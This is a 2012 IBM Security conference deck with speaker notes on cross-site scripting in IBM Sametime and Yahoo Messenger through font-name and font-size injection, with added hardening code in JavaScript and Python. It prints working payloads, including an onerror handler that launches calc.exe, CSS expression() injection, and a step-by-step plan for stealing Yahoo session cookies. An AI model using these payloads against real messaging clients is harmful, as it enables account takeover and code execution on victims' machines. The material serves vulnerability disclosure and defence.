© 2012 IBM Corporation
IBM Security Systems
Stylish XSS
via Font Name Injection
Background - Instant Messengers
<Text Style="
font-family:Segoe UI;
font-weight:bold;
font-style:italic;
color:#008000;
">Hi!</Text>
Background - Instant Messengers
Every time I’ve seen this screen, I wondered
“What if I could use some HTML here…”
Background - Windows Fonts
Windows accepts basically any character as part of the font name
Font name length limited to ~30 chars
IBM Lotus SameTime Messenger
<span style="font-size:14pt;font-family:Segoe UI;
font-weight:normal;font-style:normal;">You Do!</span>
SameTime - Exploit - CSS
Font Name: expression(alert(1));
Desired output:
<span style= ";font-family:expression(alert(1));…">
Actual output:
<span style="">
SameTime - Exploit - New Attribute
Font Name: "onclick="alert(1)"
Desired output:
<span style="font-size:9pt;font-family:"
onclick="alert(1)" ...">
Actual output:
<span style="font-size:9pt;font-family:"
onclick="">
SameTime - Exploit
~50 Fonts Later
SameTime - Exploit - Found
Message sent:
<span style="…font-family:e0"
<<style<style</style>img x='>Rest of Orig CSS">'
src='x'
onerror='location="c:windowssystem32calc.exe" '
</span>
Message Received:
<span style="…font-family:e0">
<img x='>Rest of Orig CSS">'
src='x'
onerror='location="c:windowssystem32calc.exe" '
</span>
What the received markup shows, step by step: the " inside the font name closes the style attribute and the span tag is closed right after e0; the <style<style</style> run is stripped but its leading < is kept, so the remainder of the font name arrives as an <img> tag; the client's own trailing CSS and closing quote are swallowed into the x='…' attribute value, after which src and onerror survive as real attributes.
© 2012 IBM Corporation
IBM Security Systems
17
SameTime – Remote Code Execution
<span style="font-size:14pt;font-family:e0">
<img x=';font-weight:normal;font-style:normal;">' src='x'
onerror='location="c:windowssystem32calc.exe"'</span>
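As an added example (not code from the slides or from IBM), the following JavaScript contrasts the concatenation pattern the Sametime markup above implies with a renderer that validates the font name before it touches any markup. The function names, the allowlist pattern and the sample values are assumptions; the crafted font name is the one shown on the preceding slides, and the other inputs are constructed. The lesson from the deck is that the font list is attacker-controlled input like any other, so the consumer of the name must restrict it rather than try to filter the resulting HTML afterwards.

```javascript
// Added example, not code from the slides or from IBM: rendering an IM message
// where the font name comes from an untrusted source (the OS font list, which
// accepts almost any character). The client in the deck concatenated the name
// into a style="" attribute and then filtered the output; the fix is to
// validate the name against an allowlist before any markup exists and to
// escape whatever does reach the attribute.

// Allowlist for a font family (assumed policy): starts with a letter or digit,
// then letters, digits, spaces, hyphens or underscores; at most 64 characters.
// Quotes, angle brackets, parentheses, ';', ':' and '&' can never pass.
const SAFE_FONT_NAME = /^[A-Za-z0-9][A-Za-z0-9 _-]{0,63}$/;

function isSafeFontName(name) {
  return typeof name === "string" && SAFE_FONT_NAME.test(name);
}

// Minimal HTML escaping for text nodes and double-quoted attribute values.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// The vulnerable shape from the deck: raw string concatenation into style="".
function renderUnsafe(fontName, text) {
  return '<span style="font-size:14pt;font-family:' + fontName +
         ';font-weight:normal;font-style:normal;">' + text + "</span>";
}

// Hardened renderer: every declaration value is either validated or drawn
// from a fixed vocabulary, and both the attribute and the text are escaped.
function renderSafe(opts, text) {
  const family = isSafeFontName(opts.fontName) ? opts.fontName : "sans-serif";
  const size = Number.isInteger(opts.sizePt) && opts.sizePt >= 6 && opts.sizePt <= 72
    ? opts.sizePt : 14;
  const color = /^#[0-9a-fA-F]{6}$/.test(opts.color || "") ? opts.color : "#000000";
  const decls = [
    "font-size:" + size + "pt",
    "font-family:" + family,
    "font-weight:" + (opts.bold ? "bold" : "normal"),
    "font-style:" + (opts.italic ? "italic" : "normal"),
    "color:" + color,
  ].join(";");
  return '<span style="' + escapeHtml(decls) + '">' + escapeHtml(text) + "</span>";
}

// Sample input: the crafted font name from the slides (constructed here as a
// string literal) next to an ordinary one.
const CRAFTED_NAME = "e0\"<<style<style</style>img x='>";
const NORMAL_NAME = "Segoe UI";

// Runs both renderers over both names; returns the four outputs for inspection.
function demo() {
  return {
    unsafeNormal: renderUnsafe(NORMAL_NAME, "Hi!"),
    unsafeCrafted: renderUnsafe(CRAFTED_NAME, "Hi!"),
    safeNormal: renderSafe({ fontName: NORMAL_NAME }, "Hi!"),
    safeCrafted: renderSafe({ fontName: CRAFTED_NAME }, "Hi!"),
  };
}
```

The hardened path never needs to know what the filter in the deck was trying to strip: a name that fails the allowlist is replaced by a generic family, and the text is escaped regardless, so neither the `<<style` trick nor the `"onclick=` variant from the earlier slides has anything to break out of.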
Yahoo Messenger
Yahoo Messenger – Message View
Lots of Colors, but that’s about it…
Yahoo Messenger - History View
Finally, Yahoo's
purple alert!
Yahoo Messenger - The Payload
<img src="x"onmouseover="alert(1)">
Yahoo Messenger - Digging Deeper
Wait, what?
It's not local?!
Yahoo Messenger - Digging Deeper
Accessing this URL in Chrome yields the same result.
Yahoo Messenger - Digging Deeper
That means I can read the cookie!
And steal your account!
Yahoo Messenger - Recap
1. Send the victim a message that contains a malicious HTML snippet
2. Wait 3-4 hours for it to show up in the history
3. Convince the user to access his history, or send him a direct link to it (after all, it's not local)
4. Have the victim click the Instant Message from the drop-down box
Yahoo Messenger - Introducing: Web Messenger!
Finally I can see the results of my attacks in
real time!
Yahoo Messenger - Web Messenger
During the tests, I noticed that a <Font> tag sent as part of the message text is rendered differently in the Web Messenger.
• The message:
<font face="xxx" size="20">33333</font>
• Was rendered as:
<font style="font-size:20pt" face="xxx"
id="yui_3_2_0_20_1330267588862427">33333</font>
Yahoo Messenger - Exploiting CSS
Add a new rule with an expression() call.
Yahoo Messenger - Exploiting CSS
Started with:
<font face=ssss size="1&color:red">xxxx</font>
To my surprise, the response came back as I hoped:
<font style="font-size:1&amp;color:red" >xxxx</font>
Yahoo Messenger - Exploiting CSS
Next was the expression:
<font face=sssss size="1&color:expression(alert(1))"
>xxxx</font>
And again, it seems like nothing is filtering this...
<font style="font-size:1&amp;color:expression(alert(1))"
>xxxx</font>
Yahoo Messenger - Exploiting CSS
Time to open Internet Explorer!
Yahoo Web Messenger - IE Version
The Rules (for IE):
1. The Size attribute must be surrounded by double-quotes (" ")
2. The size value must be followed by the "pt;" suffix
<font size="15pt;"> is rendered as <font style="font-size=15pt;">
Yahoo Web Messenger - IE Version
By tweaking the size value, a new Font-Family CSS rule could be injected.
<font size="15pt;font-family:aaaa;"> is rendered as <font style="font-size=15pt;font-family: aaaa;">
Yahoo Web Messenger - IE Version
With all that in mind, and ~30 <Font> tags later, came the following payload that bypasses the CSS filtering:
<font size="15pt;font-family:expression(alert(1));">
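The Web Messenger slides above (the `1&color:red` size value and the `15pt;font-family:…` rules) share one root cause: the legacy `size` attribute was HTML-encoded and then copied verbatim into `font-size:`. Encoding stops tag breakout but does nothing against CSS declaration injection, because `&`, `;` and `(` are ordinary CSS. As an added example, not Yahoo's code, the JavaScript below translates `<font face size>` the way a client should: the size is parsed with the legacy HTML semantics (1-7, or +n/-n relative to 3) and mapped through a fixed table, the face goes through an allowlist, and anything rejected is reported so it can be logged. Function names, the allowlist pattern and the keyword table are assumptions; the sample attribute values are the ones from the slides.

```javascript
// Added example, not Yahoo's code: translating the legacy <font face size>
// attributes of an incoming message into style properties without passing the
// raw attribute value through. Only one of seven keyword strings can ever be
// emitted for the size, so "1&color:red" or
// "15pt;font-family:expression(alert(1));" are rejected, not encoded.

// Legacy <font size> to CSS font-size keyword, index = size - 1
// (the mapping the HTML rendering rules use for 1..7).
const FONT_SIZE_KEYWORDS = [
  "x-small", "small", "medium", "large", "x-large", "xx-large", "xxx-large",
];

// Allowlist for a face name (assumed policy): no CSS or HTML metacharacters.
const SAFE_FACE = /^[A-Za-z0-9][A-Za-z0-9 _-]{0,63}$/;

// Returns a font-size keyword, or null if the value is not a legacy size.
function fontSizeKeyword(raw) {
  if (typeof raw !== "string") return null;
  const m = /^\s*([+-]?)(\d{1,2})\s*$/.exec(raw);
  if (m === null) return null;            // "1&color:red", "15pt;..." stop here
  let n = parseInt(m[2], 10);
  if (m[1] === "+") n = 3 + n;            // relative to the default size 3
  else if (m[1] === "-") n = 3 - n;
  n = Math.max(1, Math.min(7, n));        // clamp to 1..7 as browsers do
  return FONT_SIZE_KEYWORDS[n - 1];
}

// Builds an object of CSS properties meant for assignment to element.style
// (DOM property assignment, never a string-built style="" attribute), plus
// the list of attributes that were rejected and should be logged.
function translateFontAttrs(attrs) {
  const style = {};
  const rejected = [];
  if (Object.prototype.hasOwnProperty.call(attrs, "size")) {
    const kw = fontSizeKeyword(attrs.size);
    if (kw !== null) style.fontSize = kw;
    else rejected.push("size");
  }
  if (Object.prototype.hasOwnProperty.call(attrs, "face")) {
    if (typeof attrs.face === "string" && SAFE_FACE.test(attrs.face)) {
      style.fontFamily = attrs.face;
    } else {
      rejected.push("face");
    }
  }
  return { style, rejected };
}

// Constructed samples: the benign message from the deck and the two injected
// size values it shows.
const SAMPLES = [
  { face: "xxx", size: "20" },
  { face: "ssss", size: "1&color:red" },
  { face: "sssss", size: "1&color:expression(alert(1))" },
  { face: "aaaa", size: "15pt;font-family:expression(alert(1));" },
];

// Translates every sample; returns the results in order.
function runSamples() {
  return SAMPLES.map(translateFontAttrs);
}
```

In a browser the caller assigns the returned properties directly (`el.style.fontSize = style.fontSize`) instead of composing a `style=""` string, so there is no CSS text to inject into at all; the `rejected` array is the signal a defender wants to see in client logs when someone is probing the translator.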
Yahoo Web Messenger - IE Version
It should work correctly according to the rendered source in
IE Developer Tools
Yahoo Web Messenger - IE Version
Yet somehow, no alert
Yahoo Web Messenger - Uber Meta!
After ~5 hours of more fiddling and long lonely IM chats with myself,
I finally found out what I was afraid of.
Or in other words, the "No Expression For You" meta tag:
<meta http-equiv="X-UA-Compatible" content="IE=8"/>
This tag forces IE8 standards document mode, in which CSS expression() is no longer evaluated, so the injected rule is parsed but never runs; IE7, or IE8 in its compatibility modes, still evaluates it.
Yahoo Web Messenger - Going Old School
Fired up my Windows XP VM
and kicked out IE8
Yahoo Web Messenger - Finally
Yahoo Messenger - History Window
Questions?

Pigging Unit Lubricant Oil Blending Plant
 

Stylish XSS

  • 1. © 2012 IBM Corporation IBM Security Systems 1© 2012 IBM Corporation Stylish XSS via Font Name Injection
  • 2. Background - Instant Messengers
  • 3. Background - Instant Messengers <Text Style=" font-family:Segoe UI; font-weight:bold; font-style:italic; color:#008000; ">Hi!</Text>
  • 4. Background - Instant Messengers Every time I’ve seen this screen, I wondered “What if I could use some HTML here…”
  • 5. Background - Windows Fonts Windows accepts basically any character as part of the font name. Font name length limited to ~30 chars.
  • 6. IBM Lotus SameTime Messenger <span style="font-size:14pt;font-family:Segoe UI; font-weight:normal;font-style:normal;">You Do!</span>
  • 7. SameTime - Exploit - CSS Font Name: expression(alert(1));
  • 8. SameTime - Exploit - CSS Font Name: expression(alert(1)); Desired output: <span style= ";font-family:expression(alert(1));…"> Actual output: <span style="">
  • 9. SameTime - Exploit - New Attribute Font Name: "onclick="alert(1)" Desired output: <span style="font-size:9pt;font-family:“ onclick="alert(1)" ..."> Actual output: <span style="font-size:9pt;font-family:" onclick="">
  • 10. SameTime - Exploit ~50 Fonts Later
  • 11. SameTime - Exploit - Found Message sent: <span style=“…font-family: Message Received: <span style=“…font-family:
  • 12. SameTime - Exploit - Found Message sent: <span style=“…font-family:e0” <<style<style</style>img x='> Message Received: <span style=“…font-family:
  • 13. SameTime - Exploit - Found Message sent: <span style=“…font-family:e0” <<style<style</style>img x='> Message Received: <span style=“…font-family:e0”> <img x='>
  • 14. SameTime - Exploit - Found Message sent: <span style=“…font-family:e0” <<style<style</style>img x='>Rest of Orig CSS"> Message Received: <span style=“…font-family:e0”> <img x='>Rest of Orig CSS">
  • 15. SameTime - Exploit - Found Message sent: <span style=“…font-family:e0” <<style<style</style>img x='>Rest of Orig CSS">' src='x' onerror='location="c:windowssystem32calc.exe" ' Message Received: <span style=“…font-family:e0”> <img x='>Rest of Orig CSS">
  • 16. SameTime - Exploit - Found Message sent: <span style=“…font-family:e0” <<style<style</style>img x='>Rest of Orig CSS">' src='x' onerror='location="c:windowssystem32calc.exe" ' </span> Message Received: <span style=“…font-family:e0”> <img x='>Rest of Orig CSS">' src='x' onerror='location="c:windowssystem32calc.exe" ' </span>
  • 17. SameTime – Remote Code Execution <span style="font-size:14pt;font-family:e0"> <img x=';font-weight:normal;font-style:normal;">' src='x' onerror='location="c:windowssystem32calc.exe"'</span>
  • 18. Yahoo Messenger
  • 19. Yahoo Messenger – Message View Lots of Colors, but that’s about it…
  • 20. Yahoo Messenger - History View
  • 21. Yahoo Messenger - History View
  • 22. Yahoo Messenger - History View Finally, Yahoo's purple alert!
  • 23. Yahoo Messenger - The Payload <img src="x"onmouseover="alert(1)">
  • 24. Yahoo Messenger - Digging Deeper Wait, what? It's not local?!
  • 25. Yahoo Messenger - Digging Deeper Accessing this URL in Chrome yields the same result.
  • 26. Yahoo Messenger - Digging Deeper That means I can read the cookie! And steal your account!
  • 27. Yahoo Messenger - Recap 1. Send the victim a message that contains a malicious HTML snippet 2. Wait 3-4 hours for it to show up in the history 3. Convince the user to access his history or send him a direct link to it (after all, it's not local) 4. Have the victim click the Instant Message from the drop-down box
  • 28. Yahoo Messenger - Introducing: Web Messenger! Finally I can see the results of my attacks in real time!
  • 29. Yahoo Messenger - Web Messenger During the tests, I noticed that a <Font> tag sent as part of the message text is rendered differently in the Web Messenger. • The message: <font face="xxx" size="20">33333</font> • Was rendered as: <font style="font-size:20pt" face="xxx“ id="yui_3_2_0_20_1330267588862427">33333</font>
  • 30. Yahoo Messenger - Exploiting CSS Add a new rule with an expression() call.
  • 31. Yahoo Messenger - Exploiting CSS Started With: <font face=ssss size="1&color:red">xxxx</font> To my surprise the response came back as I hoped: <font style="font-size:1&amp;color:red" >xxxx</font>
  • 32. Yahoo Messenger - Exploiting CSS Next was the expression: <font face=sssss size="1&color:expression(alert(1))" >xxxx</font> And again, it seems like nothing is filtering this... <font style="font-size:1&amp;color:expression(alert(1))" >xxxx</font>
  • 33. Yahoo Messenger - Exploiting CSS Time to open Internet Explorer!
  • 34. Yahoo Web Messenger - IE Version
  • 35. Yahoo Web Messenger - IE Version The Rules (for IE): 1. The Size attribute must be surrounded by double-quotes (" ") 2. The size value must be followed by the "pt;" suffix <font size="15pt;"> <font style="font-size=15pt;">
  • 36. Yahoo Web Messenger - IE Version By tweaking the size value, a new Font-Family CSS rule could be injected. <font size="15pt;font-family:aaaa;"> <font style="font-size=15pt;font-family: aaaa;">
  • 37. Yahoo Web Messenger - IE Version With all that in mind, and ~30 <Font> tags later, came the following payload that bypasses the CSS filtering: <font size="15pt;font-family:expression(alert(1));">
  • 38. Yahoo Web Messenger - IE Version It should work correctly according to the rendered source in IE Developer Tools
  • 39. Yahoo Web Messenger - IE Version Yet somehow, no alert
  • 40. Yahoo Web Messenger - Uber Meta! After ~5 hours of more fiddling and long lonely IM chats with myself I finally found out what I was afraid of. Or in other words, The "No Expression For You" Meta Tag <meta http-equiv="X-UA-Compatible" content="IE=8"/>
  • 41. Yahoo Web Messenger - Going Old School Fired up my Windows XP VM and kicked out IE8
  • 42. Yahoo Web Messenger - Finally
  • 43. Yahoo Messenger - History Window
  • 44. Questions?
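Both clients fail the same way: a user-controlled font name (and, in Yahoo's case, a font size) is copied into a `style` attribute after a blocklist filter. The following is an added example, not code from the slides or from either product: it validates the font name against an allowlist of characters a font name actually needs and accepts only an integer point size when turning a `<font size>` into CSS. The `strip_style_tags_once` function is a hypothetical reconstruction of the one-pass filter the speaker notes describe, kept only to show why it leaves `<img x='` behind; the real filters are not on the page.

```python
"""Hardened handling of user-influenced font names and sizes.

Added example (not code from the slides or from either product). The
blocklist filter below is a hypothetical reconstruction of the behaviour
the speaker notes describe ("filter deletes the <style<style</style part").
"""
import html
import re

# Payloads as shown on the slides (constructed inputs for the demo).
FONT_PAYLOAD = "e0\" <<style<style</style>img x='"
SIZE_PAYLOAD = "15pt;font-family:expression(alert(1));"

# Windows accepts nearly any character in a font name (slide 5), so a
# blocklist can never be complete; allow only what a font name needs,
# capped at the ~30 characters Windows permits.
_FONT_NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9 _\-]{0,29}$")


def strip_style_tags_once(value: str) -> str:
    """Hypothetical one-pass blocklist filter: removes <style...</style>.

    Removing the inner element leaves the outer '<' joined to 'img x=',
    which is exactly the bypass the slides show.
    """
    return re.sub(r"<style.*?</style>", "", value, flags=re.S)


def safe_font_family(name: str) -> str:
    """Return the name if it looks like a font name, else a safe default."""
    name = name.strip()
    return name if _FONT_NAME_RE.fullmatch(name) else "sans-serif"


def safe_font_size_pt(size: str) -> int:
    """Accept only a one- or two-digit point size, clamped to 6..72."""
    if not re.fullmatch(r"\d{1,2}", size.strip()):
        return 10  # anything with units, ';' or '&' is not a size
    return max(6, min(int(size), 72))


def render_message(font_name: str, size: str, text: str) -> str:
    """Build the <span> template the clients use, with every field checked.

    The style string is assembled only from validated pieces and then
    attribute-encoded; the message text is HTML-escaped separately.
    """
    family = safe_font_family(font_name)
    size_pt = safe_font_size_pt(size)
    style = f"font-size:{size_pt}pt;font-family:{family};"
    return f'<span style="{html.escape(style, quote=True)}">{html.escape(text)}</span>'


if __name__ == "__main__":
    print(strip_style_tags_once(FONT_PAYLOAD))   # the '<img x=' survives
    print(render_message(FONT_PAYLOAD, SIZE_PAYLOAD, "<b>hi</b>"))
    print(render_message("Segoe UI", "14", "You Do!"))
```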

Editor's Notes

  1. Who am I? This presentation is going to show an idea I had and how I leveraged this idea into 3 vulnerabilities in the major IM clients, one of which will not be disclosed today because it has not yet been patched. It will be published in our blog once it is patched.
  2. Explain how IMs work. Talk about: the message window is actually a browser; the user's text message is wrapped in an HTML\XML template containing the following fields; the message is sent and then rendered as HTML\XML in the client's browser. It accepts parameters dictating: color, font name, font weight, font style and more. Let's talk about IMs and set aside for a moment all the video, sound and file-transfer functionality etc., keeping only the message-sending aspect. If we try to map the ways we have to send input into the system, we arrive at something like this example.
  4. To configure all these settings, these apps usually come with a screen like this one. Every time I’ve seen this screen, I wondered “what if I could use some HTML here…”
  5. And apparently, you can! Windows fonts: all chars are valid; max 30 chars in every font name.
  6. Explain that the font we change goes into this template and is then sent out. Talk about possibilities of exploits: 1. Expression 2. Get out to span tag 3. Get out to HTML main context
  7. Starting off with expression
  8. The server actually filtered everything in the CSS
  9. Moving to the next payload: getting out of the style attr and getting into a new onclick attr. Results in the onclick being empty. No good.
  10. Two-field attack. First field (Font Name): 1. Filter deletes the <style<style</style part 2. We are left with e0”><img x=‘…, which opens a new IMG tag with an X attribute (using a single quote). Second field (Message Text): 1. Closes the X attribute (it contains all the rest of the real CSS) 2. Adds a SRC attribute 3. Adds an ONERROR attribute relocating the window to an EXE/BAT file 4. File will be executed
  16. Second line shows the trapped CSS in the X parameter. Calc executed example.
  17. Yahoo: No history found in the local FS, meaning the template is unknown. Messages sent take about 3-4 hours till they register in the History. That means that every time I wanted to test anything, I had to wait 3-4 hours for the results and only then tweak my payloads and resend everything…
  18. Message view seems to sanitize input well; all messages sent managed to do nothing more than pretty colors. Taking into account the fact that every test takes 3 hours, I decided it's best to move on and open the history.
  19. Looks a bit better but still, nothing interesting…
  20. The next step I took was to change the history filter to “Instant Messages”
  21. Boom. Endless pop-ups popped up… Apparently a lot of my tests worked…
  22. I isolated the simplest payload that worked and we can now move on and get some info such as: User Agent, Privileges, etc…
  23. Digging deeper got us the browser type (IE) and the location of the page, which is an internet address.
  24. So I tried accessing this page using Chrome, and as long as I was logged in to Yahoo! it got me the same results!
  25. The next thing I found was the cookie. Apparently, Yahoo doesn't like to use HTTP-only cookies, so stealing the cookie actually means stealing the account!
  26. Send message. Wait 3-4h. Social engineer the user into opening the History. Have the user click on the Instant Messages context menu.
  27. No more 3-hour tests. I can now send a message and see it on the web messenger immediately. I now know the template.
  28. I sent the first line of code; the web messenger rendered the second line of code. Changes: Added a new ID attribute – we don't care! Transformed the Size attribute into a CSS Font-Size attribute – very interesting!
  29. First, I tried to inject a new color:red sentence, using the & -> &amp; encoding in order to terminate the CSS rule and inject a new one. And that worked without a glitch.
  30. Tried the same with an expression call, and all seems well
  31. Opening IE. But no alert… After digging a little deeper
  32. Different sanitizer per browser. Found an older message that has a similar behavior. Worked on that example till I found some guidelines for the transformation on IE.
  33. Talk about the two rules of transformation
  34. Using these guidelines I attempted a new rule injection
  35. Payload found – new rule injected. Explain the CSS encoding trick.
  36. Everything looks good in IE
  37. Somehow, no alert
  38. Goddamn meta tag. But this meta tag doesn't work in IE<8
  39. VM Kick off IE8
  40. Entered the same URL with IE 7 and the alert shows up
  41. Also in the original History view of the messenger which actually uses the installed IE